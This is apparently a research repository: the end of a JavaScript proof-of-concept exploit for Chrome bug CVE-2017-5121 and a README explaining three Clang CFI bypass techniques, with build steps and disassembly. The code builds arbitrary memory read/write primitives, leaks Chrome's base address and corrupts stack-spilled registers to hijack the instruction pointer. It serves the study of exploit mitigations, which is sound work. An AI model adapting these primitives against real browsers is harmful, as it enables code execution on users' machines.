173 |    inf0leak(function(a1, a2) {
174 |          if(a1 != 1.2) {
175 |             ab1_buffer_addr = float2hex(a1);
176 |             ab1_js_arr_addr = float2hex(a2);
177 |             //print("[+] ab1_buffer_addr: " + ab1_buffer_addr.toString(16));
178 |             //print("[+] ab1_js_arr_addr: " + ab1_js_arr_addr.toString(16));
179 |             done = true;
180 |          }
181 |       }
182 |    )
183 | }
184 | //
185 | // perform leak for ab2
186 | //
187 | ab = ab2;
188 | done=false;
189 | while(!done) {
190 |    inf0leak(function(a1, a2) {
191 |          if(a1 != 1.2) {
192 |             ab2_buffer_addr = float2hex(a1);
193 |             //print("[+] ab2_buffer_addr: " + ab2_buffer_addr.toString(16));
194 |             done = true;
195 |          }
196 |       }
197 |    )
198 | }
199 | 
200 | //
201 | // convert to u64 objects for easier usage
202 | //
203 | u64_ab1_buffer_addr = u64_from_hex_string(ab1_buffer_addr.toString(16));
204 | u64_ab1_js_arr_addr = u64_from_hex_string(ab1_js_arr_addr.toString(16)).subi(0,1);
205 | u64_ab2_buffer_addr = u64_from_hex_string(ab2_buffer_addr.toString(16));
206 | u64_ab2_js_arr_addr = u64_ab1_js_arr_addr.addi(0,0x50);
207 | 
208 | //
209 | // Create fake ArrayBuffer/DataView (see MS blog post)
210 | //
211 | tw64(0x28, u64_ab1_buffer_addr.addi(0,0x100 + 1));
212 | tw64(0x100 + 0x00, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
213 | tw64(0x100 + 0x08, u64_ab1_buffer_addr.addi(0, 0x200 + 1));
214 | tw64(0x100 + 0x18, u64_ab1_buffer_addr.addi(0, 0x300 + 1));
215 | tw64(0x100 + 0x20, u64(0,0));
216 | tw64(0x100 + 0x28, u64(0x2000,0));
217 | 
218 | tw32(0x200 + 0x0c, 0x1000c5);
219 | 
220 | tw64(0x300 + 0x20, u64_ab1_js_arr_addr.addi(0,0x20));
221 | 
222 | 
223 | //
224 | // trigger CVE-2017-5121 again to overwrite the buffer address of ab1
225 | // this allows us then to manipulate the buffer address of ab2, which
226 | // we then can use to read/write arbitrary memory
227 | //
228 | var fake_ab = hex2float(ab1_buffer_addr+1);
229 | var prepare_ab1_hi = function(f) {
230 |    var o = {
231 |       a : {},
232 |       b : {
233 |          bc : {
234 |             bca: [fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab, fake_ab],
235 |             oo1 : 1.2,
236 |             oo2 : {},
237 |          },
238 |          ba : {},
239 |          bb : {bba: {bbaa: 0, bbab: 0, bbac: this} },
240 |       },
241 |    };
242 |    o.b.bb.bba.bbab = 0;
243 |    o.b.ba.bca = f(o.b.bc.oo1, o.b.bc.oo2);
244 | }
245 | 
246 | done =false;
247 | while(!done) {
248 |    prepare_ab1_hi( function(a1, a2) {
249 |          if(a1 != 1.2) {
250 |             DataView.prototype.setUint32.apply(a2, [0, u64_ab1_js_arr_addr.lo_, true]);
251 |             DataView.prototype.setUint32.apply(a2, [4, u64_ab1_js_arr_addr.hi_, true]);
252 |             done = true;
253 |          }
254 |       }
255 |    )
256 | }
257 | 
258 | //
259 | // defining rw primitives
260 | //
261 | var dv_ab1 = new DataView(ab1);
262 | var dv_ab2 = new DataView(ab2);
263 | 
264 | var set_ab2_addr = function(u64_addr) {
265 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x20, u64_addr.lo_, true]);
266 |    DataView.prototype.setUint32.apply(dv_ab1, [0x50+0x24, u64_addr.hi_, true]);
267 | }
268 | 
269 | var r64 = function(u64_addr) {
270 |    set_ab2_addr(u64_addr);
271 |    var rl = DataView.prototype.getUint32.apply(dv_ab2, [0, true]);
272 |    var rh = DataView.prototype.getUint32.apply(dv_ab2, [4, true]);
273 |    var r64t = u64(rh, rl);
274 |    return r64t;
275 | }
276 | 
277 | var w64 = function(u64_addr, u64_val) {
278 |    set_ab2_addr(u64_addr);
279 |    DataView.prototype.setUint32.apply(dv_ab2, [0, u64_val.lo_, true]);
280 |    DataView.prototype.setUint32.apply(dv_ab2, [4, u64_val.hi_, true]);
281 | }
282 | 
283 | 
284 | //
285 | // Leak address of isolate for disclosing a valid stack address
286 | // 
287 | var isolate = r64(u64_ab1_js_arr_addr);
288 | isolate = isolate.and(u64(0xFFFFFFFF, 0xFFF80000));
289 | isolate = r64(isolate.addi(0,0x38));
290 | isolate = isolate.and(u64(0xFFFFFFFF, 0xFFFFFFC0));
291 | print("[+] isolate: " + isolate.hex());
292 | 
293 | //
294 | // large allocations are page-aligned + the partition alloc meta data
295 | // with a pointer to the main binary/lib is stored 3 page before 
296 | //
297 | var part_alloc_arr = r64(u64_ab1_buffer_addr.subi(0,0x3000)); // WTF::Partitions::array_buffer_allocator_
298 | var chrome_base = part_alloc_arr.subi(0,0x84308F0);
299 | print("[+] chrome base: " + chrome_base.hex());
300 | 
301 | 
302 | 
303 | //
304 | // get the address of the XMLHttpRequest object
305 | // 
306 | var tmp = new XMLHttpRequest();
307 | var tt = chrome_base.addi(0,0x8404FB0);      // 0x8404FB0 blink::ThreadState::main_thread_state_storage_
308 | tt = r64(tt.addi(0,0x98));                   // check blink::XMLHttpRequest::Create(blink::ExecutionContext *) 
309 | xhr_addr = r64(tt.addi(0,0xb8)).addi(0,0x8);
310 | var xhr = new XMLHttpRequest();
311 | 
312 | // 
313 | // create fake C++ object with a ptr to a fake vtable
314 | // which contains the address 
315 | //   
316 | var fake_obj = u64_ab1_buffer_addr.addi(0,0x400);
317 | var fake_vtable = u64_ab1_buffer_addr.addi(0,0x500);
318 | w64(fake_obj, fake_vtable);
319 | 
320 | var bypass_llvm_cfi = true;
321 | 
322 | if(bypass_llvm_cfi == false) {
323 |    //
324 |    // The attempt to hijack the control flow will result in an exception
325 |    // 
326 |    // Thread 29 "Chrome_InProcRe" received signal SIGILL, Illegal instruction.
327 |    // [Switching to Thread 0x7fffcef6b700 (LWP 103446)]
328 |    // 0x000055555b78b3a9 in blink::V8EventTarget::addEventListenerMethodCallback(v8::FunctionCallbackInfo<v8::Value> const&) ()
329 |    // 1: x/3i $rip
330 |    // => 0x55555b78b3a9 <blink::V8EventTarget::addEventListenerMethodCallback(v8::FunctionCallbackInfo<v8::Value> const&)+1177>:      ud2
331 |    //
332 |    w64(xhr_addr, fake_obj);
333 |    xhr.addEventListener("onload", function(e) {alert("foo");}, false);
334 | }
335 | else {
336 |    //
337 |    // thread_local_top_ contains pointer to the stack 
338 |    //
339 |    var thread_local_top_ = isolate.addi(0,0x18D0);
340 | 
341 |    //
342 |    // change RIP to following address
343 |    // 
344 |    w64(fake_vtable.addi(0,0x48), u64(0x4141,0x4242));
345 |    
346 |    var xhr_delay = function(e) {
347 |       print('[+] thread_local_top_ ' + thread_local_top_.hex());
348 |       var c_entry_fp_ = r64(thread_local_top_.addi(0,0x70));
349 |       var handler_    = r64(thread_local_top_.addi(0,0x78));
350 | 
351 |       //
352 |       // stack frame of blink::EventTarget::FireEventListeners(blink::Event *,blink::EventTargetData *,blink::HeapVector<blink::RegisteredEventListener,1ul> &)
353 |       //
354 |       var stack = c_entry_fp_.addi(0,0x9A0);
355 |       var r13_stack_addr = stack.addi(0,0x28);
356 |       var r15_stack_addr = stack.addi(0,0x38);
357 |       
358 |       w64(r13_stack_addr, fake_obj);
359 |       w64(r15_stack_addr, fake_vtable.subi(0,0x15F940));
360 |    }
361 | 
362 |    xhr.onreadystatechange = xhr_delay;
363 |    xhr.open("GET", "c0ffee", true);
364 | }
365 | </script>
366 | </body>
367 | </html>
368 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Clang Control Flow Integrity (CFI) Bypass Techniques
  2 | In the following we demonstrate three exploitation techniques to bypass Clang's CFI implementation [0] when applied to Chromium [1]. Clang implements fine-grained CFI, hence, unlike Microsoft's/Intel's CFI implementation CFGuard/CET, it cannot be bypassed using COOP [3]. The first two proof-of-concept exploits do not attack the CFI implementation itself but exploit the absence of other mitigation, i.e., JIT region protection and return address protection. Both techniques are well known, and we include them for completeness. Our third attack exploits a weakness in Clang's CFI that exists because the compiler tries to optimize the CFI run-time check. We implement our proof-of-concept exploits for an older version of the Chromium browser, which is vulnerable to cve-2017-5121 [4]. 
  3 | 
  4 | ## Setup
  5 | We used our server for compilation and a VM for testing, hence, two different versions. We provide the binaries for easier testing.
  6 | 
  7 | ### Compilation
  8 | System: Ubuntu 14.04.5 LTS  
  9 | Follow Google's instructions [2] and check out / compile a vulnerable version
 10 | ```
 11 | fetch --nohooks chromium
 12 | cd src/
 13 | git fetch --tags
 14 | git checkout -b cve-2017-5121 61.0.3163.100
 15 | gclient sync --with_branch_heads
 16 | ./build/install-build-deps.sh 
 17 | gclient runhooks
 18 | # enable "turbo_escape" by setting it to" "true" in v8/src/flag-definitions.h
 19 | gn gen out/cfi '--args=is_debug=false is_cfi=true use_cfi_cast=true use_thin_lto=true' --check
 20 | ninja -C out/cfi chrome 
 21 | ```
 22 | 
 23 | ### Execution
 24 | System: Ubuntu 16.04.3 LTS  
 25 | Binaries: https://drive.google.com/file/d/1Ik8q_nOdq-pdRqTgEfVVT7rO-e9V2vs2/ (150mb)  
 26 | Run it with `./chrome --no-sandbox --single-process --disable-gpu <path to exploit>`. For our proof-of-concept exploits we focus on hijacking the instruction pointer (= bypassing CFI), hence, their effectiveness can only be observed with an attached debugger.
 27 | 
 28 | ## Proof-of-concept Exploits
 29 | cve-2017-5121 is a bug in the escape analysis of Chrome's JIT engine. The vulnerability allows to disclose memory, as well as, corrupt arbitrary data. Details can be found in the corresponding blog post by Microsoft [5]. We exploit this vulnerability to gain arbitrary read-write to the render process.
 30 | 
 31 | ### PoC-1: [code injection into JIT region](cve-2017-5121-code-injection.html)
 32 | Chromium/V8 keeps its JIT region mapped as RWX. Hence, by disclosing its address the attacker can inject a malicious payload, and invoke the payload by calling the corresponding JavaScript function. This is the most common attack technique to achieve arbitrary code execution in Chromium. This techniques is also described by Microsoft [5], and explains why Chrome does not include CFI by default despite its very low impact on the overall performance.
 33 | 
 34 | ### PoC-2: [corrupting return address](cve-2017-5121-ret-addr-corruption.html)
 35 | Assuming that the JIT region is no longer writable, e.g., by adapting a similar strategy as Chakra [6], the attacker needs to leverage traditional code-reuse attack techniques like Return-oriented Programming (ROP). Since Clang-CFI focuses on protecting forward branches, the attacker can hijack the control flow by corrupting a return address. Therefore, the attacker first discloses a stack address, e.g., the `isolate` struct which contains stack addresses (e.g., `isolate->thread_local_top_->c_entry_fp_`), and then leverages the arbitrary read/write primitive to overwrite a return address of an active stackframe.
 36 | 
 37 | ### PoC-3: [corrupting stack-spilled registers](cve-2017-5121-spilled-register.html)
 38 | The previous two attacks do not directly bypass Clang-CFI but exploit the absence of the strict enforcement of w^x memory and return address protection. However, both are feasible in practice [6, 7]. Hence, for our third attack we assume that these mitigations are in place.
 39 | 
 40 | Due to how Clang-CFI is implemented, the compiler generates code that in some cases spills registers, which contain CFI-related values, temporarily to writable memory (stack). This is a problem because these CFI-values are supposed to be immutable as they are used to determine whether a call/jump destination address is valid or not. Hence, the attacker can modify the enforced CFI policy by corrupting these spilled registers.
 41 | 
 42 | An analysis of the Chrome binary yields a surprisingly large number of instances where this happens. However, it is unlikely that all of these cases are exploitable, because this technique requires the attacker to reliably corrupt stack values without a stack-based memory-corruption vulnerability. In a browser setting this can be achieved either by spawning separate threads, or JavaScript callback functions. We refer to our previously published paper [8] for more details.
 43 | 
 44 | For our PoC we use JavaScript callbacks: first, we trigger the execution of native code, which is subject to CFI run-time checks, by invoking a function member function of a JavaScript object. If defined, this code will trigger the execution of a JavaScript callback function, hence, switching the execution back to JavaScript. As a consequence, the stackframe of the native code can be reliably manipulated while executing JavaScript. We leverage our read/write primitive within the callback function (see `xhr_delay()`) to then corrupt the spilled register.
 45 | 
 46 | We trigger the execution of the native code/callback by creating a `XMLHttpRequest` (line 310) JavaScript object and setting `onreadystatechange` to `xhr_delay()` (line 362). Calling the `open()` function of the `XMLHttpRequest` object will invoke the native `blink::EventTarget::FireEventListeners()` function.
 47 | ```
 48 | .text:00000000068E3970 ; _QWORD __cdecl blink::EventTarget::FireEventListeners(blink::EventTarget *__hidden this, blink::Event *)
 49 | .text:00000000068E3970
 50 | .text:00000000068E3970 var_40          = qword ptr -40h
 51 | .text:00000000068E3970 var_38          = qword ptr -38h
 52 | .text:00000000068E3970
 53 | .text:00000000068E3970                 push    rbp
 54 | .text:00000000068E3971                 push    r15
 55 | .text:00000000068E3973                 push    r14
 56 | .text:00000000068E3975                 push    r13
 57 | .text:00000000068E3977                 push    r12
 58 | .text:00000000068E3979                 push    rbx
 59 | .text:00000000068E397A                 sub     rsp, 18h
 60 | .text:00000000068E397E                 mov     r14, rsi
 61 | .text:00000000068E3981                 mov     r13, rdi
 62 | .text:00000000068E3984                 mov     rax, [r13+0]
 63 | .text:00000000068E3988                 lea     r15, __typeid__ZTSN5blink4NodeE_global_addr ; <---- should stay read-only
 64 | .text:00000000068E398F                 mov     rcx, rax
 65 | .text:00000000068E3992                 sub     rcx, r15
 66 | .text:00000000068E3995                 ror     rcx, 3
 67 | .text:00000000068E3999                 cmp     rcx, 41418h
 68 | .text:00000000068E39A0                 ja      loc_68E3C1B
 69 | .text:00000000068E39A6                 lea     rdx, __typeid__ZTSN5blink11EventTargetE_byte_array
 70 | .text:00000000068E39AD                 test    byte ptr [rcx+rdx], 80h
 71 | .text:00000000068E39B1                 jz      loc_68E3C1B
 72 | .text:00000000068E39B7                 mov     rdi, r13
 73 | .text:00000000068E39BA                 call    qword ptr [rax+0C8h]
 74 | [...]
 75 | .text:00000000068E3A9E                 mov     rdi, r13
 76 | .text:00000000068E3AA1                 mov     rsi, r14
 77 | .text:00000000068E3AA4                 mov     rdx, rbx
 78 | .text:00000000068E3AA7                 mov     rcx, r12
 79 | .text:00000000068E3AAA                 call    blink::EventTarget::FireEventListeners(blink::Event *,blink::EventTargetData *,blink::HeapVector<blink::RegisteredEventListener,1ul> &)
 80 | .text:00000000068E3AAF                 test    al, al
 81 | ```
 82 | This snippet is taken from the function prologue. Later the another `FireEventListeners()` (different arguments) which eventually will change the context to execute the JavaScript callback function:
 83 | ```
 84 | .text:00000000068E3DA0 blink::EventTarget::FireEventListeners(blink::Event *, blink::EventTargetData *, blink::HeapVector<blink::RegisteredEventListener, 1ul> &) proc near
 85 | ; [...]
 86 | .text:00000000068E3DA0                 push    rbp
 87 | .text:00000000068E3DA1                 push    r15  ; <---- not so read-only anymore
 88 | .text:00000000068E3DA3                 push    r14
 89 | .text:00000000068E3DA5                 push    r13  
 90 | .text:00000000068E3DA7                 push    r12
 91 | ; [...]
 92 | ; Switch to JavaScript execution, in our case xhr_delay() is executed.
 93 | ; Note, r13 and r15 are temporarily spilled on the stack.
 94 | ; [...]
 95 | .text:00000000068E486D                 add     rsp, 1D8h
 96 | .text:00000000068E4874                 pop     rbx
 97 | .text:00000000068E4875                 pop     r12
 98 | .text:00000000068E4877                 pop     r13  
 99 | .text:00000000068E4879                 pop     r14
100 | .text:00000000068E487B                 pop     r15  ; <---- loaded from writable memory
101 | .text:00000000068E487D                 pop     rbp
102 | .text:00000000068E487E                 retn
103 | ```
104 |  After returning from `FireEventListeners()`, the execution continues with the following code:
105 | ```
106 | .text:00000000068E3AAA                 call    blink::EventTarget::FireEventListeners(blink::Event *,blink::EventTargetData *,blink::HeapVector<blink::RegisteredEventListener,1ul> &)
107 | .text:00000000068E3AAF                 test    al, al
108 | .text:00000000068E3AB1                 jnz     loc_68E3B5D
109 | .text:00000000068E3AB7                 jmp     loc_68E3BDF
110 | [...]
111 | .text:00000000068E3B5D loc_68E3B5D:
112 | ;
113 | ; Not vulnerable CFI check, because rdx is freshly loaded
114 | ;
115 | .text:00000000068E3B5D                 mov     rax, [r14]
116 | .text:00000000068E3B60                 lea     rdx, __typeid__ZTSN5blink5EventE_global_addr
117 | .text:00000000068E3B67                 mov     rcx, rax
118 | .text:00000000068E3B6A                 sub     rcx, rdx
119 | .text:00000000068E3B6D                 ror     rcx, 7
120 | .text:00000000068E3B71                 cmp     rcx, 0BCh
121 | .text:00000000068E3B78                 lea     rbx, __typeid__ZTSN5blink11EventTargetE_byte_array
122 | .text:00000000068E3B7F                 ja      loc_68E3C1B
123 | .text:00000000068E3B85                 lea     rdx, __typeid__ZTSN5blink5EventE_byte_array
124 | .text:00000000068E3B8C                 test    byte ptr [rcx+rdx], 40h
125 | .text:00000000068E3B90                 jz      loc_68E3C1B
126 | .text:00000000068E3B96                 mov     rdi, r14
127 | .text:00000000068E3B99                 call    qword ptr [rax+40h]
128 | ;
129 | ; Vulnerable CFI check:
130 | ;
131 | ; r13 and r15 are loaded at the beginning of the function and then pushed/popped
132 | ; to/from the stack during nested function calls. Note, that the following CFI check
133 | ; is similar to the one in the beginning of the function. This is probably the reasons the
134 | ; compiler decided to load the values once and keep them in a callee-save register.
135 | ;
136 | .text:00000000068E3B9C                 mov     rax, [r13+0]
137 | .text:00000000068E3BA0                 mov     rcx, rax
138 | .text:00000000068E3BA3                 sub     rcx, r15 ; <----  r15 is corrupted
139 | .text:00000000068E3BA6                 ror     rcx, 3
140 | .text:00000000068E3BAA                 cmp     rcx, 41418h ; <---- will pass
141 | .text:00000000068E3BB1                 ja      short loc_68E3C1B  
142 | .text:00000000068E3BB3                 test    byte ptr [rcx+rbx], 80h ; <---- will pass
143 | .text:00000000068E3BB7                 jz      short loc_68E3C1B
144 | .text:00000000068E3BB9                 mov     rdi, r13
145 | .text:00000000068E3BBC                 call    qword ptr [rax+48h]  ; <---- set RIP to arbitrary address
146 | ```
147 | 
148 | 
149 | 
150 | ## References
151 | [0] https://clang.llvm.org/docs/ControlFlowIntegrity.html  
152 | [1] https://www.chromium.org/developers/testing/control-flow-integrity  
153 | [2] https://chromium.googlesource.com/chromium/src/+/master/docs/linux_build_instructions.md  
154 | [3] http://syssec.rub.de/media/emma/veroeffentlichungen/2015/03/28/COOP-Oakland15.pdf  
155 | [4] https://bugs.chromium.org/p/chromium/issues/detail?id=765433  
156 | [5] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/browser-security-beyond-sandboxing  
157 | [6] https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution  
158 | [7] https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf  
159 | [8] https://www.informatik.tu-darmstadt.de/fileadmin/user_upload/Group_TRUST/PubsPDF/ccs15.stackdefiler.pdf  


--------------------------------------------------------------------------------